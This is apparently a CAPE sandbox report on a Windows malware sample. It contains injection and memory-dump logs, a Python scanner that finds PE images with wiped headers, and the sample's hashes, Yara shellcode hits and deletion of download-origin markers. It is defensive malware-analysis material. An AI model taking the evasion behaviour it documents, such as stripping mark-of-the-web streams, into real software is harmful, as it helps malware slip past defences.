2019-01-10 03:38:09,714 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x500000-0x5321f1.
2019-01-10 03:38:09,714 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\1304_715938710412019
2019-01-10 03:38:09,762 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1304_715938710412019
2019-01-10 03:38:09,778 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x52de20 - 0x5321f1.
2019-01-10 03:38:09,778 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x52de20.
2019-01-10 03:38:09,792 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x500000.
2019-01-10 03:38:09,809 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:38:09,825 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:38:09,825 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:38:09,839 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:38:09,839 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:38:09,855 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:38:09,855 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:38:09,887 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1304_856938710412019
2019-01-10 03:38:09,887 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:38:09,903 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:38:09,917 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:38:09,917 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:38:10,931 [root] INFO: Notified of termination of process with pid 1304.
2019-01-10 03:38:11,914 [root] INFO: Process with pid 1304 has terminated
2019-01-10 03:38:13,069 [root] INFO: Announced 32-bit process name: 3304035876.exe pid: 1936
2019-01-10 03:38:13,069 [root] INFO: Added new process to list with pid: 1936
2019-01-10 03:38:13,085 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:13,101 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:13,115 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1936
2019-01-10 03:38:13,147 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:13,147 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x3f0000
2019-01-10 03:38:13,147 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:13,163 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:13,178 [root] INFO: Monitor successfully loaded in process with pid 1936.
2019-01-10 03:38:27,437 [root] INFO: Announced 32-bit process name: 2400240831.exe pid: 2620
2019-01-10 03:38:27,453 [root] INFO: Added new process to list with pid: 2620
2019-01-10 03:38:27,453 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:27,483 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:27,483 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2620
2019-01-10 03:38:27,499 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:27,499 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:38:27,515 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:27,515 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:27,530 [root] INFO: Monitor successfully loaded in process with pid 2620.
2019-01-10 03:38:27,765 [root] DEBUG: ProtectionHandler: Address: 0x2cde20, RegionSize: 0x43d1
2019-01-10 03:38:27,779 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x2cde20
2019-01-10 03:38:27,796 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x2cde20, AllocationSize: 0x43d1, ThreadId: 0xa24
2019-01-10 03:38:27,811 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x2cde20 and Type=0x0.
2019-01-10 03:38:27,826 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x2cde20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:38:27,842 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x2cde20
2019-01-10 03:38:27,858 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x2cde20
2019-01-10 03:38:27,874 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x2cde20.
2019-01-10 03:38:27,874 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x2a0000, size 0x321f1).
2019-01-10 03:38:27,888 [root] DEBUG: DumpPEsInRange: Scanning range 0x2a0000 - 0x2d21f1.
2019-01-10 03:38:27,888 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x2a0000-0x2d21f1.
2019-01-10 03:38:27,888 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2620_8892738710412019
2019-01-10 03:38:27,921 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2620_8892738710412019
2019-01-10 03:38:27,921 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x2cde20 - 0x2d21f1.
2019-01-10 03:38:27,936 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x2cde20.
2019-01-10 03:38:27,951 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x2a0000.
2019-01-10 03:38:27,967 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:38:27,967 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:38:27,983 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:38:27,999 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:38:28,013 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:38:28,029 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:38:28,029 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:38:28,092 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2620_452838710412019
2019-01-10 03:38:28,108 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:38:28,108 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:38:28,122 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:38:28,138 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:38:29,168 [root] INFO: Notified of termination of process with pid 2620.
2019-01-10 03:38:29,855 [root] INFO: Process with pid 2620 has terminated
2019-01-10 03:38:31,040 [root] INFO: Announced 32-bit process name: 2686919881.exe pid: 224
2019-01-10 03:38:31,040 [root] INFO: Added new process to list with pid: 224
2019-01-10 03:38:31,055 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:31,072 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:31,086 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 224
2019-01-10 03:38:31,118 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:31,134 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:38:31,150 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:31,164 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:31,180 [root] INFO: Monitor successfully loaded in process with pid 224.
2019-01-10 03:38:45,798 [root] INFO: Announced 32-bit process name: 2293722122.exe pid: 2392
2019-01-10 03:38:45,845 [root] INFO: Added new process to list with pid: 2392
2019-01-10 03:38:45,923 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:46,095 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:46,203 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2392
2019-01-10 03:38:46,328 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:46,453 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x2e0000
2019-01-10 03:38:46,578 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:46,733 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:46,858 [root] INFO: Monitor successfully loaded in process with pid 2392.
2019-01-10 03:38:47,140 [root] DEBUG: ProtectionHandler: Address: 0x52de20, RegionSize: 0x43d1
2019-01-10 03:38:47,265 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x52de20
2019-01-10 03:38:47,421 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x52de20, AllocationSize: 0x43d1, ThreadId: 0x298
2019-01-10 03:38:47,529 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x52de20 and Type=0x0.
2019-01-10 03:38:47,608 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x52de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:38:47,638 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x52de20
2019-01-10 03:38:47,654 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x52de20
2019-01-10 03:38:47,654 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x52de20.
2019-01-10 03:38:47,654 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x500000, size 0x321f1).
2019-01-10 03:38:47,654 [root] DEBUG: DumpPEsInRange: Scanning range 0x500000 - 0x5321f1.
2019-01-10 03:38:47,670 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x500000-0x5321f1.
2019-01-10 03:38:47,670 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2392_6704738710412019
2019-01-10 03:38:47,700 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2392_6704738710412019
2019-01-10 03:38:47,700 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x52de20 - 0x5321f1.
2019-01-10 03:38:47,700 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x52de20.
2019-01-10 03:38:47,700 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x500000.
2019-01-10 03:38:47,717 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:38:47,717 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:38:47,717 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:38:47,733 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:38:47,733 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:38:47,733 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:38:47,733 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:38:47,763 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2392_7334738710412019
2019-01-10 03:38:47,763 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:38:47,795 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:38:47,795 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:38:47,795 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:38:48,825 [root] INFO: Notified of termination of process with pid 2392.
2019-01-10 03:38:49,292 [root] INFO: Announced 32-bit process name: 1227434603.exe pid: 2932
2019-01-10 03:38:49,308 [root] INFO: Added new process to list with pid: 2932
2019-01-10 03:38:49,308 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:38:49,338 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:38:49,355 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2932
2019-01-10 03:38:49,371 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:38:49,371 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:38:49,385 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:38:49,401 [root] INFO: Disabling sleep skipping.
2019-01-10 03:38:49,401 [root] INFO: Process with pid 2392 has terminated
2019-01-10 03:38:49,417 [root] INFO: Monitor successfully loaded in process with pid 2932.
2019-01-10 03:38:57,108 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-01-10 03:38:57,217 [root] INFO: Created shutdown mutex.
2019-01-10 03:38:58,293 [root] INFO: Setting terminate event for process 2912.
2019-01-10 03:38:58,809 [root] INFO: Setting terminate event for process 1340.
2019-01-10 03:38:59,322 [root] INFO: Setting terminate event for process 2572.
2019-01-10 03:38:59,854 [root] INFO: Setting terminate event for process 2884.
2019-01-10 03:39:00,461 [root] INFO: Setting terminate event for process 1352.
2019-01-10 03:39:01,039 [root] INFO: Setting terminate event for process 2332.
2019-01-10 03:39:01,648 [root] INFO: Setting terminate event for process 2436.
2019-01-10 03:39:02,272 [root] INFO: Setting terminate event for process 2208.
2019-01-10 03:39:02,895 [root] INFO: Setting terminate event for process 2604.
2019-01-10 03:39:03,519 [root] INFO: Setting terminate event for process 1356.
2019-01-10 03:39:04,049 [root] INFO: Setting terminate event for process 1936.
2019-01-10 03:39:04,331 [root] INFO: Announced 32-bit process name: 2673932424.exe pid: 2396
2019-01-10 03:39:04,346 [root] INFO: Added new process to list with pid: 2396
2019-01-10 03:39:04,346 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:39:04,346 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:39:04,361 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2396
2019-01-10 03:39:04,378 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:39:04,392 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:39:04,408 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:39:04,408 [root] INFO: Disabling sleep skipping.
2019-01-10 03:39:04,424 [root] INFO: Monitor successfully loaded in process with pid 2396.
2019-01-10 03:39:04,565 [root] INFO: Setting terminate event for process 224.
2019-01-10 03:39:04,611 [root] DEBUG: ProtectionHandler: Address: 0x57de20, RegionSize: 0x43d1
2019-01-10 03:39:04,611 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x57de20
2019-01-10 03:39:04,627 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x57de20, AllocationSize: 0x43d1, ThreadId: 0x97c
2019-01-10 03:39:04,642 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x57de20 and Type=0x0.
2019-01-10 03:39:04,642 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x57de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:39:04,658 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x57de20
2019-01-10 03:39:04,690 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x57de20
2019-01-10 03:39:04,704 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x57de20.
2019-01-10 03:39:04,704 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x550000, size 0x321f1).
2019-01-10 03:39:04,720 [root] DEBUG: DumpPEsInRange: Scanning range 0x550000 - 0x5821f1.
2019-01-10 03:39:04,720 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x550000-0x5821f1.
2019-01-10 03:39:04,720 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2396_721439710412019
2019-01-10 03:39:04,767 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2396_721439710412019
2019-01-10 03:39:04,782 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x57de20 - 0x5821f1.
2019-01-10 03:39:04,815 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x57de20.
2019-01-10 03:39:04,815 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x550000.
2019-01-10 03:39:04,845 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:39:04,861 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:39:04,861 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:39:04,877 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:39:04,892 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:39:04,907 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:39:04,924 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:39:04,954 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2396_939439710412019
2019-01-10 03:39:04,954 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:39:04,970 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:39:04,970 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:39:04,986 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:39:05,079 [root] INFO: Setting terminate event for process 2932.
2019-01-10 03:39:05,595 [root] INFO: Setting terminate event for process 2396.
2019-01-10 03:39:06,000 [root] INFO: Notified of termination of process with pid 2396.
2019-01-10 03:39:06,108 [root] INFO: Shutting down package.
2019-01-10 03:39:06,108 [root] INFO: Stopping auxiliary modules.
2019-01-10 03:39:06,125 [root] INFO: Finishing auxiliary modules.
2019-01-10 03:39:06,141 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-01-10 03:39:06,155 [root] INFO: Analysis completed.
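The log lines above show the extraction package in action: a memory-protection change on a freshly written region triggers 'ProtectionHandler', which arms a hardware execution breakpoint on the protected address; when execution reaches it, 'DumpPEsInRange' / 'ScanForDisguisedPE' scan the region for a PE header and dump what they find (no PE in the 0x500000 region, which is dumped raw; a PE at 0x400000 whose entry point VA is 0x4055d7). The following Python is an added example, not CAPE's code: it performs a comparable scan over a dumped range, validates IMAGE_NT_HEADERS by structure rather than by the 'MZ' / 'PE\0\0' magic bytes, so an image whose signatures were wiped is still found, and reports the entry point as region base + AddressOfEntryPoint. The minimal PE32 image it scans is constructed inline (base 0x400000, entry RVA 0x55d7, SizeOfImage 0xd000, the values in the log); the header-validation heuristics and the e_lfanew back-search are this example's own assumptions.

```python
"""Scan a dumped memory range for PE images (including ones whose 'MZ'/'PE\\0\\0'
magic was wiped) and report the entry point VA the way the log does:
region base + AddressOfEntryPoint (0x400000 + 0x55d7 = 0x4055d7).
Heuristics are this example's own, not CAPE's implementation."""
import struct

MACHINES = {0x014C: "i386", 0x8664: "x64"}
OPT_MAGIC = {0x10B: (0xE0, "PE32"), 0x20B: (0xF0, "PE32+")}   # magic -> (standard opt hdr size, name)
SECTION_HDR = 40


def u16(b, o): return struct.unpack_from("<H", b, o)[0]
def u32(b, o): return struct.unpack_from("<I", b, o)[0]


def parse_nt_headers(buf, off):
    """Validate IMAGE_NT_HEADERS at `off` without looking at the signature bytes."""
    if off + 24 + 0xF0 > len(buf):
        return None
    machine, nsec = u16(buf, off + 4), u16(buf, off + 6)
    opt_size, magic = u16(buf, off + 20), u16(buf, off + 24)
    if machine not in MACHINES or not 0 < nsec <= 96 or magic not in OPT_MAGIC:
        return None
    if opt_size != OPT_MAGIC[magic][0]:            # only the standard sizes: keeps false positives low
        return None
    sect_align, size_of_image = u32(buf, off + 56), u32(buf, off + 80)
    if sect_align == 0 or sect_align & (sect_align - 1) or size_of_image == 0:
        return None
    image_base = u32(buf, off + 52) if magic == 0x10B else struct.unpack_from("<Q", buf, off + 48)[0]
    sections, sec_off = [], off + 24 + opt_size
    for n in range(nsec):
        s = sec_off + n * SECTION_HDR
        if s + SECTION_HDR > len(buf):
            return None
        sections.append({"name": buf[s:s + 8].rstrip(b"\0").decode("latin-1"),
                         "vsize": u32(buf, s + 8), "va": u32(buf, s + 12)})
    return {"machine": MACHINES[machine], "format": OPT_MAGIC[magic][1],
            "entry_rva": u32(buf, off + 40), "header_image_base": image_base,
            "size_of_image": size_of_image, "sections": sections}


def scan_for_pe(buf, region_base):
    """Return every PE image in `buf`, a range dumped from memory at `region_base`.
    The DOS header's e_lfanew (rarely wiped) recovers the image start even when 'MZ' is gone."""
    found, i = [], 0
    while i + 24 < len(buf):
        hdr = parse_nt_headers(buf, i)
        if hdr is None:
            i += 1
            continue
        start = i                                              # fallback: NT headers with no DOS header
        for j in range(i - 0x40, max(i - 0x400, 0) - 1, -1):   # nearest candidate DOS header first
            if u32(buf, j + 0x3C) == i - j:                    # e_lfanew points exactly at these NT headers
                start = j
                break
        hdr.update(image_offset=start, image_va=region_base + start,
                   entry_va=region_base + start + hdr["entry_rva"],
                   mz_intact=buf[start:start + 2] == b"MZ",
                   pe_sig_intact=buf[i:i + 4] == b"PE\0\0")
        found.append(hdr)
        i = max(i + 1, start + hdr["size_of_image"])           # skip past the image just found
    return found


def dump_report(buf, region_base):
    """Lines in the spirit of the CAPE log: what was scanned and what was found."""
    lines = [f"Scanning range {region_base:#x} - {region_base + len(buf):#x}"]
    for pe in scan_for_pe(buf, region_base):
        lines.append(f"PE image ({pe['format']} {pe['machine']}) located at: {pe['image_va']:#x}, "
                     f"entry point VA {pe['entry_va']:#x}, sections {[s['name'] for s in pe['sections']]}, "
                     f"MZ intact={pe['mz_intact']}, PE sig intact={pe['pe_sig_intact']}")
    if len(lines) == 1:
        lines.append("No PE image located")
    return lines


def build_sample_pe32(image_base=0x400000, entry_rva=0x55D7, size_of_image=0xD000):
    """Constructed minimal PE32 image (not the analysed sample) as it would sit in memory."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                     # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x014C, 3, 0x5C2E0000, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<HBBIIIIIII", opt, 0, 0x10B, 6, 0, 0x7000, 0x4000, 0,
                     entry_rva, 0x1000, 0x8000, image_base)
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)             # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, size_of_image, 0x400)      # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                          # Subsystem: GUI
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    sections = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, va, raw, rawptr, 0, 0, 0, 0, flags)
        for name, vsize, va, raw, rawptr, flags in (
            (b".text", 0x6E00, 0x1000, 0x7000, 0x400, 0x60000020),
            (b".rdata", 0x1A00, 0x8000, 0x1C00, 0x7400, 0x40000040),
            (b".data", 0x2000, 0xA000, 0x0600, 0x9000, 0xC0000040)))
    img = dos + b"PE\0\0" + file_hdr + bytes(opt) + sections
    return bytes(img + b"\xCC" * (size_of_image - len(img)))


if __name__ == "__main__":
    image = build_sample_pe32()
    disguised = bytearray(image)
    disguised[0:2] = b"\0\0"                  # wipe 'MZ'
    disguised[0x80:0x84] = b"\0\0\0\0"        # wipe 'PE\0\0'
    for region in (image, bytes(disguised), b"\x90" * 0x2000):   # third: code with no PE at all
        print("\n".join(dump_report(region, 0x400000)))
```

The disguised case is the one worth keeping in mind when reading the log: a dumper that keys on the magic bytes alone misses an unpacked image whose header was deliberately damaged, while a region with no PE at all (like 0x500000 above) is still worth dumping raw and scanning with Yara.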

MalScore

10.0

Malicious

Machine

Name target-01
Label target-01
Manager ESX
Started On 2019-01-10 03:35:21
Shutdown On 2019-01-10 03:39:21

File Details

File Name 2019-01-08-initial-malware-retrieved-by-JS-file.exe
File Size 144384 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 77067974a70af43a3cadf88219d1e28c
SHA1 7aa8fd4d0e0f44a4ed37f8542f7a1b0bc9faa58c
SHA256 4c0103c745fa6e173821035c304863d751bea9c073d19070d9ebf8685da95040
SHA512 9872bcfd51d5e05d17ad23410326744c13d6d757a998867043a906475cde22daa0ab523bedbf430b8e48043c340e382c74978089ecf0e39cd56d4797b60cc09d
CRC32 9BD949DF
Ssdeep 1536:EJuqJbIXcA+Uli+SR1rJ0Fgc/7rSmOnVO1en5n/bFzhvYCvCY1AbIwLVbV56:yLJbIXjPkSgnzDHFCjbI8V
TrID
  • 61.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 13.0% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 8.9% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 4.0% (.EXE) OS/2 Executable (generic) (2029/13)
  • 4.0% (.EXE) Clipper DOS Executable (2018/12)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2992 triggered the Yara rule 'embedded_pe'
Hit: PID 2992 triggered the Yara rule 'shellcode'
Hit: PID 2912 triggered the Yara rule 'embedded_pe'
Hit: PID 2912 triggered the Yara rule 'shellcode'
Hit: PID 2744 triggered the Yara rule 'embedded_pe'
Hit: PID 2744 triggered the Yara rule 'shellcode'
Hit: PID 1340 triggered the Yara rule 'embedded_pe'
Hit: PID 1340 triggered the Yara rule 'shellcode'
Hit: PID 2956 triggered the Yara rule 'embedded_pe'
Hit: PID 2956 triggered the Yara rule 'shellcode'
Hit: PID 1132 triggered the Yara rule 'embedded_pe'
Hit: PID 1132 triggered the Yara rule 'shellcode'
Hit: PID 2528 triggered the Yara rule 'embedded_pe'
Hit: PID 2528 triggered the Yara rule 'shellcode'
Hit: PID 2572 triggered the Yara rule 'embedded_pe'
Hit: PID 2572 triggered the Yara rule 'shellcode'
Hit: PID 3008 triggered the Yara rule 'embedded_pe'
Hit: PID 3008 triggered the Yara rule 'shellcode'
Hit: PID 2924 triggered the Yara rule 'embedded_pe'
Hit: PID 2924 triggered the Yara rule 'shellcode'
Hit: PID 2420 triggered the Yara rule 'embedded_pe'
Hit: PID 2420 triggered the Yara rule 'shellcode'
Hit: PID 1304 triggered the Yara rule 'embedded_pe'
Hit: PID 1304 triggered the Yara rule 'shellcode'
Hit: PID 2620 triggered the Yara rule 'embedded_pe'
Hit: PID 2620 triggered the Yara rule 'shellcode'
Hit: PID 2392 triggered the Yara rule 'embedded_pe'
Hit: PID 2392 triggered the Yara rule 'shellcode'
Hit: PID 2396 triggered the Yara rule 'embedded_pe'
Hit: PID 2396 triggered the Yara rule 'shellcode'
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe:Zone.Identifier
DeletedFile: C:\Windows\5769805074060605\winsvcs.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2841536727.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3751939260.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1865041414.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2080821079.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1257032286.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1674519319.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3065331339.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3876917383.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\2810629864.exe:Zone.Identifier
